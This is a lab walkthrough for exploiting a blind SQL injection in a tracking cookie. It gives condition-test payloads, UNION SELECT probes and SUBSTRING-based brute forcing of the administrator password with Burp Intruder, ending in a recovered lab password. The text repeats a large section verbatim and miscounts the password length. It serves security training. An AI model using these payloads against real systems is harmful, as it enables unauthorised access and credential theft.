Problem Statement :
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and no error messages are displayed. But the application includes a “Welcome back” message in the page if the query returns any rows.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
Using this method below we will first find out if there is a possibility of blind SQL injection or not.
SELECT TrackingId FROM Table_Name WHERE TrackingId = ‘ZC5EuA7KoIDaKOyB’
SELECT TrackingId FROM Table_Name WHERE TrackingId = x’AND ‘1’ = ‘1–
‘ SELECT TrackingId FROM Table_Name WHERE TrackingId = x’AND ‘1’ = ‘2–
Steps to solve this.
First we need to find out if there is a Blind SQL injection or not. With the below trick we will be able to figure this out.
- Is to send ‘ AND 1=1 — in the cookie and we can see in the response we will get to see the Welcome back message.
I am using burp suit to capture the traffic and perform the further checks.
In the below Cookie Tracking ID I am entering the condition which will always be true. ‘ AND 1=1–
I get welcome back message.
If I do ‘ and 1=2– then the welcome back message will not be there in the response.
Explanation – of the above demo.
–> The first of these values will cause the query to return results, because the injected AND ‘1’=’1 condition is true, and so the “Welcome back” message will be displayed.
–> Whereas the second value will cause the query to not return any results, because the injected condition is false, and so the “Welcome back” message will not be displayed.
** This allows us to determine the answer to any single injected condition, and so extract data one bit at a time.
For example, suppose there is a table called Users with the columns Username and Password, and a user called Administrator. We can systematically determine the password for this user by sending a series of inputs to test the password one character at a time.
Note : Refer to What is SUBSTRING in SQL? Subsection on this to understand the substring syntax.
To do this, we start with the following input:
xyz’ AND SUBSTRING((SELECT Password FROM Users WHERE Username = ‘Administrator’), 1, 1) > ‘m
This returns the “Welcome back” message, indicating that the injected condition is true, and so the first character of the password is greater than m.
Next, we send the following input:
xyz’ AND SUBSTRING((SELECT Password FROM Users WHERE Username = ‘Administrator’), 1, 1) > ‘t
This does not return the “Welcome back” message, indicating that the injected condition is false, and so the first character of the password is not greater than t.
Eventually, we send the following input, which returns the “Welcome back” message, thereby confirming that the first character of the password is s:
xyz’ AND SUBSTRING((SELECT Password FROM Users WHERE Username = ‘Administrator’), 1, 1) = ‘s
We can continue this process to systematically determine the full password for the Administrator user
- In the second step we will figure out if the Supplied username is valid or not, if the username column and password column is available or not. It will also confirm the length of the password. Let’s see this on the MSQL with example.
Assumption – In this example I am using First name as user name and last name as password.
This query is going to show us the output of the Last name if it matches with the conditions below.
Note : the user first name and last name is Steve Jobs.
SELECT cust_last_name FROM custdetails WHERE cust_first_name = ‘steve’ AND length (cust_last_name) > 4;
Example 1 – In this case I am trying to check if the user’s last name (password) is it grater than 4 ?
Since we don’t see any result that means it is not grater than 4 digit.
Example 2 – In the second example, I will say is it grater than 3 then I am getting to see the last name of Steve. Because the last name is grater than 3 but less than equal to 4. I get the answer in my output which is, the last name of steve.
Let’s check the above example from Burp and let’s see if we get to see the welcome message.
- First we will verify if the administrator user name exist or not. With the below query if it is true, we will get the welcome back message in the response.
Query : x’ UNION SELECT ‘a’ FROM USERS WHERE Username = ‘administrator’–
- Next we will find out if the length of the password is grater than 1 ?
Query : xx’ UNION SELECT ‘a’ FROM users WHERE username = ‘administrator’ AND length(password) > 1–
Similar way we go on finding the actual length of the password. Until we stop getting Welback message in the response.
xx’ UNION SELECT ‘a’ FROM users WHERE username = ‘administrator’ AND length(password) > 2–
xx’ UNION SELECT ‘a’ FROM users WHERE username = ‘administrator’ AND length(password) > 3–
And so on…
Till 19 I am getting welcome back message.
- Next is to run the payload to guess the password characters one by one
Query : XX’ UNION SELECT ‘a’ FROM users WHERE username = ‘administrator’ AND substring(password, 1, 1) = ‘a’
Now we need to set the payload to understand the password character 1 by 1. For example under
Substring(String, Starting_value, length)
We need to find out starting value = ‘a’ and so on..
Example
substring(password, 1, 1) = ‘a’
substring(password, 1, 1) = ‘b’
substring(password, 1, 1) = ‘c’
substring(password, 1, 1) = ‘d’
And so on till z…..
After that we change the starting value to 2
substring(password, 2, 1) = ‘a’
substring(password, 2, 1) = ‘b’
substring(password, 2, 1) = ‘c’
And so on…. Till z.
This goes till 19 numbers. It’s a huge password will take time.
Send the above payload to intruder and we set the payload.
Same thing we can test on our MYSQL query to find out the characters of the password one by one.
1st letter is grater than I which is J.
SELECT cust_last_name FROM custdetails WHERE cust_first_name = ‘steve’ AND SUBSTRING(cust_last_name,1,1)>’i’;
2nd letter is grater than ‘n’ which is ‘o’
SELECT cust_last_name FROM custdetails WHERE cust_first_name = ‘steve’ AND SUBSTRING(cust_last_name,2,1)>’n’;
3rd one is grater than a which is b.
SELECT cust_last_name FROM custdetails WHERE cust_first_name = ‘steve’ AND SUBSTRING(cust_last_name,3,1)>’a’;
The below query tells us that 4th character of the password is grater than R which is S.
SELECT cust_last_name FROM custdetails WHERE cust_first_name = ‘steve’ AND SUBSTRING(cust_last_name,4,1)>’r’;
Same way the intruder payload works. I verifies every alphabet with its positions. Takes lot of time.
Finally we should see the results below.
After setting the payload we need to start the attack. Sort it with Welcome column.
Now we need to jot down the password as per payload 1 column from lower to higher digit.
nnfhpuqbu12lybuvahck
1 = n
2 = n
3 = f
4 = h
5 = p
6 = u
7 = q
8 = b
9 = u
10 = 1
11 = 2
12 = l
13 = y
14 = b
15 = u
16 = v
17 = a
18 = h
19 = c
20=k
For reference –
Blind SQL injection with conditional responses (Video solution)
2nd letter is grater than ‘n’ which is ‘o’
SELECT cust_last_name FROM custdetails WHERE cust_first_name = ‘steve’ AND SUBSTRING(cust_last_name,2,1)>’n’;
3rd one is grater than a which is b.
SELECT cust_last_name FROM custdetails WHERE cust_first_name = ‘steve’ AND SUBSTRING(cust_last_name,3,1)>’a’;
The below query tells us that 4th character of the password is grater than R which is S.
SELECT cust_last_name FROM custdetails WHERE cust_first_name = ‘steve’ AND SUBSTRING(cust_last_name,4,1)>’r’;
Same way the intruder payload works. I verifies every alphabet with its positions. Takes lot of time.
Finally we should see the results below.
After setting the payload we need to start the attack. Sort it with Welcome column.
Now we need to jot down the password as per payload 1 column from lower to higher digit.
nnfhpuqbu12lybuvahck
1 = n
2 = n
3 = f
4 = h
5 = p
6 = u
7 = q
8 = b
9 = u
10 = 1
11 = 2
12 = l
13 = y
14 = b
15 = u
16 = v
17 = a
18 = h
19 = c
20=k
For reference –
Blind SQL injection with conditional responses (Video solution)
Scroll Unlock 